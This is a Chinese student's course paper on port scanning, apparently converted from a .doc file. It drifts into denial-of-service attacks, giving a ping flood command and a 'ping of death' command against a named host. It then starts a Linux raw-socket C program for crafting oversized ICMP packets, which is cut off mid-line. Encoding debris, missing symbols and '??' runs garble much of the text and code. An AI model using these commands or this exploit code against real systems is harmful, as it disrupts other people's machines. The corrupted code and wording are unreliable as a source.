一个简单的端口扫描程序.doc

　　 操 作 系 统 论 文 ——一个简单的端口扫描程序 学 院 ：计 控 学 院 姓 名 ： 班 级 ：计本045 学 号 ：2004021200 指导教师 ： 摘要 一个端口就是一个潜在的通信通道，也就是一个入侵通道。对目标计算机进行端口扫描，能得到许多有用的信息。进行扫描的方法很多，可以是手工进行扫描，也可以用端口扫描软件进行。 　　在手工进行扫描时，需要熟悉各种命令。对命令执行后的输出进行分析。用扫描软件进行扫描时，许多扫描器软件都有分析数据的功能。 　　 关 键 字： 扫描 端口扫描途径 网络 运行环境： 普通计算机一台，操作系统WINDOWS 一。引言 通过网络服务器接连访问，寻找保安上的弱点(安全漏洞)的行为。在互联网上被公开的服务器计算机遵从称为「TCP/IP」的通讯规章(协议)运行，通常准备了复数的称为「端口」的连接窗口，等着来自利用者的连接。端口扫描是按顺序调查访问这个端口，在服务器中运行的应用软件和OS的种类，调查是否有可能成为侵入口的脆弱的端口的行为。端口扫描的结果常常是安全漏洞被发现时，使用侵入用的程序进行不正当的侵入。也有时是网络管理者为调查自己管理的系统中是否有漏洞,而进行端口扫描。接受了端口扫描的服务器中会留有通讯履历(访问记录)与端口扫描的可疑记录,但会发生空开间隔进行扫描等隐藏端口扫描工作的情况。 二。分析过程 1.Ping命令的基本格式：????????ping hostname  其中hostname是目标计算机的地址。Ping还有许多高级使用，下面就是一个例子。C: ping -f hostname 　　这条命令给目标机器发送大量的数据，从而使目标计算机忙于回应。在Windows 95的计算机上，使用下面的方法：c:\windows\ping -l 65510 saddam_hussein 　　这样做了之后，目标计算机有可能会挂起来，或从新启动。由于 -l 65510 产生一个巨大的数据包。由于要求返回一个同样的数据包，会使目标计算机反应不过来。　　在Linux计算机上，可以编写一个程序来实现上述方法。#include stdio.h #include sys/types.h #include sys/socket.h #include netdb.h #include netinet/in.h #include netinet/in_systm.h #include netinet/ip.h #include netinet/ip_icmp.h ??/* * If your kernel doesnt muck with raw packets, #define REALLY_RAW. * This is probably only Linux. */ #ifdef REALLY_RAW #define FIX(x)牋htons(x) #else #define FIX(x)牋(x) #endif 牋int main(int argc, char **argv) { 牋牋牋牋int s; 牋牋牋牋char buf[1500]; 牋牋牋牋struct ip *ip = (struct ip *)buf; 牋牋牋牋struct icmp *icmp = (struct icmp *)(ip + 1); 牋牋牋牋struct hostent *hp; 牋牋牋牋struct sockaddr_in dst; 牋牋牋牋int offset; 牋牋牋牋int on = 1; 牋牋牋牋牋bzero(buf, sizeof buf); if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) 0) { 牋?牋牋牋牋牋牋爌error(socket); 牋牋牋牋牋牋牋牋exit(1); 牋牋牋牋} 牋牋牋牋if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, on, sizeof(on)) 0) { 牋牋牋牋牋牋牋牋perror(IP_HDRINCL); 牋牋牋牋牋牋牋牋exit(1); 牋牋牋牋} 牋牋牋牋if (argc != 2) { 牋牋牋牋牋牋牋牋fprintf(stderr, us